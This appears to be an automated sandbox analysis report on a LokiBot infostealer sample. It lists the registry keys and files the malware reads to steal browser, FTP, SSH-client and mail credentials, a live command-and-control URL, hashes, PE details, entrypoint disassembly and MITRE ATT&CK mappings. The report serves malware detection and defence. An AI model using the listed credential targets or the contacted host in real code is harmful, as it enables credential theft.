Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe TID: 6268

Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe

Thread delayed: delay time: 60000

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 00000000.00000002.2535715612.000000000055E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dw7h7aQwVZ.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Source: Yara match	File source: dw7h7aQwVZ.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: 00000000.00000002.2535715612.000000000055E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dw7h7aQwVZ.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	2 OS Credential Dumping	11 Virtualization/Sandbox Evasion	Remote Services	1 Email Collection	2 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Virtualization/Sandbox Evasion	1 Credentials in Registry	3 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	12 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dw7h7aQwVZ.exe	97%	ReversingLabs	Win32.Infostealer.LokiBot

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://94.156.177.220/simple/five/fre.php	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.220	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541963
Start date and time:	2024-10-25 11:28:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Sample name:	dw7h7aQwVZ.exe renamed because original name is a hash value
Original Sample Name:	6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/1@0/12
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: dw7h7aQwVZ.exe

Created / dropped Files

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\dw7h7aQwVZ.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.053515766000424
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	dw7h7aQwVZ.exe
File size:	106'496 bytes
MD5:	3fb350f4356f42b51a523b6fa8cbccf3
SHA1:	5f24115b8e734d11deea653df8b32c506c31f4b1
SHA256:	6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967
SHA512:	2cfa64f27aa30c8681d7d28ad8a330cb1c830ca6492aa916a4d3177127ee701556c80f234512802dd5c5cc1374c0f47c87ada6587a456c651e3ec3451c0e16af
SSDEEP:	1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqfIzmd:nSHIG6mQwGmfOQd8YhY0/EqUG
TLSH:	02A32A42B2A5C030F7B74DB2BB73A5B7857E7C332D22C44E9352459A14215E1EB7AB13
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4139de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0239fd611af3d0e9b0c46c5837c80e09

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ecx
and dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-04h]
push esi
push edi
push eax
call 00007F118CB48F39h
push eax
call 00007F118CB48F16h
xor esi, esi
mov edi, eax
pop ecx
pop ecx
cmp dword ptr [ebp-04h], esi
jle 00007F118CB490F6h
push 004188BCh
push dword ptr [edi+esi*4]
call 00007F118CB3B5C5h
pop ecx
pop ecx
test eax, eax
je 00007F118CB490DDh
push 00002710h
call 00007F118CB3BE7Ah
pop ecx
inc esi
cmp esi, dword ptr [ebp-04h]
jl 00007F118CB490AEh
push 00000000h
call 00007F118CB48F0Eh
push 00000000h
call 00007F118CB49222h
pop ecx
pop edi
xor eax, eax
pop esi
mov esp, ebp
pop ebp
retn 0010h
push ebp
mov ebp, esp
xor eax, eax
push eax
push eax
push E567384Dh
push eax
call 00007F118CB38869h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
push ebp
mov ebp, esp
push esi
mov esi, dword ptr [ebp+08h]
test esi, esi
je 00007F118CB49134h
push esi
call 00007F118CB3B390h
pop ecx
test eax, eax
je 00007F118CB49129h
push esi
call 00007F118CB393CCh
pop ecx
test eax, eax
je 00007F118CB4911Eh
mov eax, dword ptr [0049FDECh]
cmp dword ptr [ebp+10h], 00000000h
cmovne eax, dword ptr [ebp+10h]
push eax
push dword ptr [0049FDE8h]
call 00007F118CB3ADC4h
push dword ptr [ebp+0Ch]
push dword ptr [0049FDE8h]
call 00007F118CB3ADB6h
push 00000000h
push 00000000h
push esi

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[ASM] VS2003 (.NET) build 3077
[ASM] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2013 UPD5 build 40629
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18ed0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x5c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x136f5	0x13800	94fa411af1cc6bb168a3ea0e66e80f78	False	0.5685096153846154	data	6.49204829439013	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x4060	0x4200	15686b489e8ad18c33f8b12a6e57b4ee	False	0.3659446022727273	data	4.255999483050136	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x85e24	0x200	955b3a57edf41d6c47c7225e8d847f91	False	0.056640625	OpenPGP Public Key	0.32171607431271465	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.x	0xa0000	0x2000	0x2000	0c3dcd4efb800d2a9617b89e313aa361	False	0.0181884765625	data	0.19795807498627813	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
WS2_32.dll	getaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
KERNEL32.dll	GetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
ole32.dll	CoCreateInstance, CoInitialize, CoUninitialize
OLEAUT32.dll	VariantInit, SysFreeString, SysAllocString

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dw7h7aQwVZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Created / dropped Files

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Windows Analysis Report
dw7h7aQwVZ.exe